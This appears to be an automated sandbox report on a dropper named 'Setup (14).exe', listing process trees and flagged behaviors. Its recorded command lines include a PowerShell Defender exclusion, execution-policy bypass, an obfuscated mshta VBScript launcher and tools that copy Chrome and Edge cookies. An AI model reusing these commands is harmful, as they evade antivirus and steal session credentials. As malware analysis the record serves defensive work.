ypc_aYtRkVH5vN8Wjb4PcQIC.tmpCleaner Installation.exeInlog.tmpConhost.exeConhost.exeSetup.exeSetup.tmpSetup.tmpRtOchpiStj2VNfCQPyk1aEP2.tmpultramediaburner.tmppid process 5088 ypc_aYtRkVH5vN8Wjb4PcQIC.tmp 5540 Cleaner Installation.exe 5696 Inlog.tmp 2824 2824 5740 Conhost.exe 5880 Conhost.exe 6596 Setup.exe 7140 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 1776 RtOchpiStj2VNfCQPyk1aEP2.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 4456 ultramediaburner.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.execmd.exe4FB4.exe620C.exeMaskVPNUpdate.exepid process 2824 8732 MicrosoftEdge.exe 8772 MicrosoftEdgeCP.exe 9176 cmd.exe 8772 MicrosoftEdgeCP.exe 692 4FB4.exe 6192 620C.exe 8740 MaskVPNUpdate.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup (14).exedescription pid process target process PID 3456 wrote to memory of 1036 3456 Setup (14).exe b0v0M5P14IL6HfhwtR78DYMR.exe PID 3456 wrote to memory of 1036 3456 Setup (14).exe b0v0M5P14IL6HfhwtR78DYMR.exe PID 3456 wrote to memory of 1036 3456 Setup (14).exe b0v0M5P14IL6HfhwtR78DYMR.exe PID 3456 wrote to memory of 804 3456 Setup (14).exe SN9Sg_s51ftsNuuNGj7g1rAT.exe PID 3456 wrote to memory of 804 3456 Setup (14).exe SN9Sg_s51ftsNuuNGj7g1rAT.exe PID 3456 wrote to memory of 804 3456 Setup (14).exe SN9Sg_s51ftsNuuNGj7g1rAT.exe PID 3456 wrote to memory of 3744 3456 Setup (14).exe 54axPUQyoM5gSmQFRergm7g2.exe PID 3456 wrote to memory of 3744 3456 Setup (14).exe 54axPUQyoM5gSmQFRergm7g2.exe PID 3456 wrote to memory of 3744 3456 Setup (14).exe 54axPUQyoM5gSmQFRergm7g2.exe PID 3456 wrote to memory of 3460 3456 Setup (14).exe lGWWBHm3E8UplgySvQwCR8t4.exe PID 3456 wrote to memory of 3460 3456 Setup (14).exe lGWWBHm3E8UplgySvQwCR8t4.exe PID 3456 wrote to memory of 3460 3456 Setup (14).exe lGWWBHm3E8UplgySvQwCR8t4.exe PID 3456 wrote to memory of 1672 3456 Setup (14).exe HqeTzHZdh1KyjcFp4aA13tvd.exe PID 3456 wrote to memory of 1672 3456 Setup (14).exe HqeTzHZdh1KyjcFp4aA13tvd.exe PID 3456 wrote to memory of 1672 3456 Setup (14).exe HqeTzHZdh1KyjcFp4aA13tvd.exe PID 3456 wrote to memory of 2332 3456 Setup (14).exe Id0poKC1idN5W9bizinmQEVJ.exe PID 3456 wrote to memory of 2332 3456 Setup (14).exe Id0poKC1idN5W9bizinmQEVJ.exe PID 3456 wrote to memory of 2332 3456 Setup (14).exe Id0poKC1idN5W9bizinmQEVJ.exe PID 3456 wrote to memory of 2560 3456 Setup (14).exe SIyCPL9G7jyLe7jAVnTopx1c.exe PID 3456 wrote to memory of 2560 3456 Setup (14).exe SIyCPL9G7jyLe7jAVnTopx1c.exe PID 3456 wrote to memory of 2588 3456 Setup (14).exe feLA63PGCsTi4c1lWRXrz6Eb.exe PID 3456 wrote to memory of 2588 3456 Setup (14).exe feLA63PGCsTi4c1lWRXrz6Eb.exe PID 3456 wrote to memory of 2588 3456 Setup (14).exe feLA63PGCsTi4c1lWRXrz6Eb.exe PID 3456 wrote to memory of 2696 3456 Setup (14).exe wHIP5ak8pb1tTUGxW5Yx1CBf.exe PID 3456 wrote to memory of 2696 3456 Setup (14).exe wHIP5ak8pb1tTUGxW5Yx1CBf.exe PID 3456 wrote to memory of 3740 3456 Setup (14).exe o363rXjAh1T_ZmFhEFWs6Pzs.exe PID 3456 wrote to memory of 3740 3456 Setup (14).exe o363rXjAh1T_ZmFhEFWs6Pzs.exe PID 3456 wrote to memory of 3740 3456 Setup (14).exe o363rXjAh1T_ZmFhEFWs6Pzs.exe PID 3456 wrote to memory of 2716 3456 Setup (14).exe vsopyRXgZgkE9Zio6_CdCi1x.exe PID 3456 wrote to memory of 2716 3456 Setup (14).exe vsopyRXgZgkE9Zio6_CdCi1x.exe PID 3456 wrote to memory of 2716 3456 Setup (14).exe vsopyRXgZgkE9Zio6_CdCi1x.exe PID 3456 wrote to memory of 2272 3456 Setup (14).exe UQvCjtwlUUxmZrDhPkDuxaFf.exe PID 3456 wrote to memory of 2272 3456 Setup (14).exe UQvCjtwlUUxmZrDhPkDuxaFf.exe PID 3456 wrote to memory of 2272 3456 Setup (14).exe UQvCjtwlUUxmZrDhPkDuxaFf.exe PID 3456 wrote to memory of 380 3456 Setup (14).exe MmdyuBaUmiqTtz3iycBqc_Ne.exe PID 3456 wrote to memory of 380 3456 Setup (14).exe MmdyuBaUmiqTtz3iycBqc_Ne.exe PID 3456 wrote to memory of 380 3456 Setup (14).exe MmdyuBaUmiqTtz3iycBqc_Ne.exe PID 3456 wrote to memory of 3840 3456 Setup (14).exe DXO_fwO41293rmBk4OLPHCT1.exe PID 3456 wrote to memory of 3840 3456 Setup (14).exe DXO_fwO41293rmBk4OLPHCT1.exe PID 3456 wrote to memory of 3840 3456 Setup (14).exe DXO_fwO41293rmBk4OLPHCT1.exe PID 3456 wrote to memory of 2244 3456 Setup (14).exe l1cwCpgwAuhvwCl0y4f21XUm.exe PID 3456 wrote to memory of 2244 3456 Setup (14).exe l1cwCpgwAuhvwCl0y4f21XUm.exe PID 3456 wrote to memory of 2244 3456 Setup (14).exe l1cwCpgwAuhvwCl0y4f21XUm.exe PID 3456 wrote to memory of 2800 3456 Setup (14).exe PtyHRWTqRy0UITBsMkTArf_R.exe PID 3456 wrote to memory of 2800 3456 Setup (14).exe PtyHRWTqRy0UITBsMkTArf_R.exe PID 3456 wrote to memory of 2800 3456 Setup (14).exe PtyHRWTqRy0UITBsMkTArf_R.exe PID 3456 wrote to memory of 3316 3456 Setup (14).exe 2vjE50Tl27JNy_7vbQ35QdX4.exe PID 3456 wrote to memory of 3316 3456 Setup (14).exe 2vjE50Tl27JNy_7vbQ35QdX4.exe PID 3456 wrote to memory of 3316 3456 Setup (14).exe 2vjE50Tl27JNy_7vbQ35QdX4.exe PID 3456 wrote to memory of 2108 3456 Setup (14).exe N50FBt3JXHAi6GsYH83Yg0NO.exe PID 3456 wrote to memory of 2108 3456 Setup (14).exe N50FBt3JXHAi6GsYH83Yg0NO.exe PID 3456 wrote to memory of 2108 3456 Setup (14).exe N50FBt3JXHAi6GsYH83Yg0NO.exe PID 3456 wrote to memory of 2736 3456 Setup (14).exe v_qlaPnF5evM3dXRBD0W35_I.exe PID 3456 wrote to memory of 2736 3456 Setup (14).exe v_qlaPnF5evM3dXRBD0W35_I.exe PID 3456 wrote to memory of 2736 3456 Setup (14).exe v_qlaPnF5evM3dXRBD0W35_I.exe PID 3456 wrote to memory of 3568 3456 Setup (14).exe n3Xv5Z2LOb8T7SJHsSsOxLIZ.exe PID 3456 wrote to memory of 3568 3456 Setup (14).exe n3Xv5Z2LOb8T7SJHsSsOxLIZ.exe PID 3456 wrote to memory of 3568 3456 Setup (14).exe n3Xv5Z2LOb8T7SJHsSsOxLIZ.exe PID 3456 wrote to memory of 188 3456 Setup (14).exe znjtUrbPv9Qu57ELNXIptXVT.exe PID 3456 wrote to memory of 188 3456 Setup (14).exe znjtUrbPv9Qu57ELNXIptXVT.exe PID 3456 wrote to memory of 188 3456 Setup (14).exe znjtUrbPv9Qu57ELNXIptXVT.exe PID 3456 wrote to memory of 2220 3456 Setup (14).exe ed_7PPZS1byO0JAU7gy2jV_X.exe PID 3456 wrote to memory of 2220 3456 Setup (14).exe ed_7PPZS1byO0JAU7gy2jV_X.exe PID 3456 wrote to memory of 2220 3456 Setup (14).exe ed_7PPZS1byO0JAU7gy2jV_X.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2740
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2724
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
PID:2604 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Checks processor information in registry
PID:380
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2544
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2492
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1908
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1372
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1340
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1200
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1084
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:340 -
C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe2⤵PID:4168
-
-
C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe2⤵PID:8528
-
-
C:\Users\Admin\AppData\Roaming\trvsieaC:\Users\Admin\AppData\Roaming\trvsiea2⤵PID:10492
-
-
C:\Users\Admin\AppData\Roaming\csvsieaC:\Users\Admin\AppData\Roaming\csvsiea2⤵
- Suspicious use of SetThreadContext
PID:7480 -
C:\Users\Admin\AppData\Roaming\csvsieaC:\Users\Admin\AppData\Roaming\csvsiea3⤵
- Checks SCSI registry key(s)
PID:9832
-
-
-
C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe2⤵PID:5996
-
-
C:\Users\Admin\AppData\Roaming\trvsieaC:\Users\Admin\AppData\Roaming\trvsiea2⤵PID:6436
-
-
C:\Users\Admin\AppData\Roaming\csvsieaC:\Users\Admin\AppData\Roaming\csvsiea2⤵PID:5252
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:996
-
C:\Users\Admin\AppData\Local\Temp\Setup (14).exe"C:\Users\Admin\AppData\Local\Temp\Setup (14).exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Users\Admin\Documents\UQvCjtwlUUxmZrDhPkDuxaFf.exe"C:\Users\Admin\Documents\UQvCjtwlUUxmZrDhPkDuxaFf.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2272 -
C:\Users\Admin\Documents\UQvCjtwlUUxmZrDhPkDuxaFf.exeC:\Users\Admin\Documents\UQvCjtwlUUxmZrDhPkDuxaFf.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
-
C:\Users\Admin\Documents\o363rXjAh1T_ZmFhEFWs6Pzs.exe"C:\Users\Admin\Documents\o363rXjAh1T_ZmFhEFWs6Pzs.exe"2⤵
- Executes dropped EXE
PID:3740 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3740 -s 4843⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3264
-
-
-
C:\Users\Admin\Documents\vsopyRXgZgkE9Zio6_CdCi1x.exe"C:\Users\Admin\Documents\vsopyRXgZgkE9Zio6_CdCi1x.exe"2⤵
- Executes dropped EXE
PID:2716 -
C:\Users\Admin\Documents\vsopyRXgZgkE9Zio6_CdCi1x.exe"C:\Users\Admin\Documents\vsopyRXgZgkE9Zio6_CdCi1x.exe" -q3⤵PID:4920
-
-
-
C:\Users\Admin\Documents\wHIP5ak8pb1tTUGxW5Yx1CBf.exe"C:\Users\Admin\Documents\wHIP5ak8pb1tTUGxW5Yx1CBf.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2696 -
C:\Users\Admin\AppData\Roaming\1264403.exe"C:\Users\Admin\AppData\Roaming\1264403.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3272
-
-
C:\Users\Admin\AppData\Roaming\1543961.exe"C:\Users\Admin\AppData\Roaming\1543961.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:300 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:2712
-
-
-
C:\Users\Admin\AppData\Roaming\5504337.exe"C:\Users\Admin\AppData\Roaming\5504337.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Users\Admin\AppData\Roaming\1630908.exe"C:\Users\Admin\AppData\Roaming\1630908.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5028
-
-
-
C:\Users\Admin\Documents\feLA63PGCsTi4c1lWRXrz6Eb.exe"C:\Users\Admin\Documents\feLA63PGCsTi4c1lWRXrz6Eb.exe"2⤵
- Executes dropped EXE
PID:2588
-
-
C:\Users\Admin\Documents\SIyCPL9G7jyLe7jAVnTopx1c.exe"C:\Users\Admin\Documents\SIyCPL9G7jyLe7jAVnTopx1c.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Users\Admin\Documents\Id0poKC1idN5W9bizinmQEVJ.exe"C:\Users\Admin\Documents\Id0poKC1idN5W9bizinmQEVJ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2332
-
-
C:\Users\Admin\Documents\HqeTzHZdh1KyjcFp4aA13tvd.exe"C:\Users\Admin\Documents\HqeTzHZdh1KyjcFp4aA13tvd.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Users\Admin\Documents\lGWWBHm3E8UplgySvQwCR8t4.exe"C:\Users\Admin\Documents\lGWWBHm3E8UplgySvQwCR8t4.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3460
-
-
C:\Users\Admin\Documents\54axPUQyoM5gSmQFRergm7g2.exe"C:\Users\Admin\Documents\54axPUQyoM5gSmQFRergm7g2.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3744 -
C:\Users\Admin\Documents\54axPUQyoM5gSmQFRergm7g2.exeC:\Users\Admin\Documents\54axPUQyoM5gSmQFRergm7g2.exe3⤵
- Executes dropped EXE
PID:4892
-
-
C:\Users\Admin\Documents\54axPUQyoM5gSmQFRergm7g2.exeC:\Users\Admin\Documents\54axPUQyoM5gSmQFRergm7g2.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5048
-
-
-
C:\Users\Admin\Documents\SN9Sg_s51ftsNuuNGj7g1rAT.exe"C:\Users\Admin\Documents\SN9Sg_s51ftsNuuNGj7g1rAT.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:804
-
-
C:\Users\Admin\Documents\b0v0M5P14IL6HfhwtR78DYMR.exe"C:\Users\Admin\Documents\b0v0M5P14IL6HfhwtR78DYMR.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
C:\Users\Admin\Documents\MmdyuBaUmiqTtz3iycBqc_Ne.exe"C:\Users\Admin\Documents\MmdyuBaUmiqTtz3iycBqc_Ne.exe"2⤵
- Executes dropped EXE
PID:380 -
C:\Users\Admin\Documents\MmdyuBaUmiqTtz3iycBqc_Ne.exe"C:\Users\Admin\Documents\MmdyuBaUmiqTtz3iycBqc_Ne.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4688
-
-
-
C:\Users\Admin\Documents\l1cwCpgwAuhvwCl0y4f21XUm.exe"C:\Users\Admin\Documents\l1cwCpgwAuhvwCl0y4f21XUm.exe"2⤵
- Executes dropped EXE
PID:2244 -
C:\Users\Admin\Documents\l1cwCpgwAuhvwCl0y4f21XUm.exe"C:\Users\Admin\Documents\l1cwCpgwAuhvwCl0y4f21XUm.exe"3⤵
- Modifies data under HKEY_USERS
PID:8396
-
-
-
C:\Users\Admin\Documents\DXO_fwO41293rmBk4OLPHCT1.exe"C:\Users\Admin\Documents\DXO_fwO41293rmBk4OLPHCT1.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3840 -
C:\Users\Admin\Documents\DXO_fwO41293rmBk4OLPHCT1.exeC:\Users\Admin\Documents\DXO_fwO41293rmBk4OLPHCT1.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4840
-
-
-
C:\Users\Admin\Documents\N50FBt3JXHAi6GsYH83Yg0NO.exe"C:\Users\Admin\Documents\N50FBt3JXHAi6GsYH83Yg0NO.exe"2⤵
- Executes dropped EXE
PID:2108
-
-
C:\Users\Admin\Documents\2vjE50Tl27JNy_7vbQ35QdX4.exe"C:\Users\Admin\Documents\2vjE50Tl27JNy_7vbQ35QdX4.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3316 -
C:\Users\Admin\Documents\2vjE50Tl27JNy_7vbQ35QdX4.exe"C:\Users\Admin\Documents\2vjE50Tl27JNy_7vbQ35QdX4.exe"3⤵
- Executes dropped EXE
PID:4964
-
-
-
C:\Users\Admin\Documents\PtyHRWTqRy0UITBsMkTArf_R.exe"C:\Users\Admin\Documents\PtyHRWTqRy0UITBsMkTArf_R.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Users\Admin\Documents\n3Xv5Z2LOb8T7SJHsSsOxLIZ.exe"C:\Users\Admin\Documents\n3Xv5Z2LOb8T7SJHsSsOxLIZ.exe"2⤵
- Executes dropped EXE
PID:3568 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\N3XV5Z~1.DLL,s C:\Users\Admin\DOCUME~1\N3XV5Z~1.EXE3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5824 -
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\N3XV5Z~1.DLL,mEVTeFJ3OXRK4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
PID:9160 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\N3XV5Z~1.DLL5⤵PID:7760
-
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\N3XV5Z~1.DLL,UAZJQVhJUVI=5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
PID:9256 -
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 318046⤵PID:9612
-
C:\Windows\system32\ctfmon.exectfmon.exe7⤵PID:9792
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpE745.tmp.ps1"5⤵PID:10168
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpC64F.tmp.ps1"5⤵PID:6152
-
C:\Windows\SysWOW64\nslookup.exe"C:\Windows\system32\nslookup.exe" -type=any localhost6⤵PID:608
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask5⤵PID:7852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask5⤵PID:7460
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:8896
-
-
-
-
-
-
C:\Users\Admin\Documents\v_qlaPnF5evM3dXRBD0W35_I.exe"C:\Users\Admin\Documents\v_qlaPnF5evM3dXRBD0W35_I.exe"2⤵
- Executes dropped EXE
PID:2736 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 16443⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5380
-
-
-
C:\Users\Admin\Documents\ed_7PPZS1byO0JAU7gy2jV_X.exe"C:\Users\Admin\Documents\ed_7PPZS1byO0JAU7gy2jV_X.exe"2⤵
- Executes dropped EXE
PID:2220 -
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
PID:4276
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:4316 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:3844
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5220
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:6112
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5716
-
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:4252 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5360
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:10028
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3636
-
-
-
-
C:\Users\Admin\Documents\9B7tRXdltAWK8R6StzopAF6q.exe"C:\Users\Admin\Documents\9B7tRXdltAWK8R6StzopAF6q.exe"2⤵
- Executes dropped EXE
PID:3436 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\9B7tRXdltAWK8R6StzopAF6q.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\9B7tRXdltAWK8R6StzopAF6q.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )3⤵PID:4532
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\9B7tRXdltAWK8R6StzopAF6q.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\9B7tRXdltAWK8R6StzopAF6q.exe" ) do taskkill -f -iM "%~NxA"4⤵PID:1056
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS5⤵
- Executes dropped EXE
PID:4552 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )6⤵PID:380
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"7⤵PID:5208
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a6⤵PID:5824
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "9B7tRXdltAWK8R6StzopAF6q.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5260
-
-
-
-
-
C:\Users\Admin\Documents\znjtUrbPv9Qu57ELNXIptXVT.exe"C:\Users\Admin\Documents\znjtUrbPv9Qu57ELNXIptXVT.exe"2⤵
- Executes dropped EXE
PID:188 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 6803⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 6763⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 6763⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 6603⤵
- Program crash
PID:4324
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 11683⤵
- Program crash
PID:5864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 11203⤵
- Program crash
PID:5808
-
-
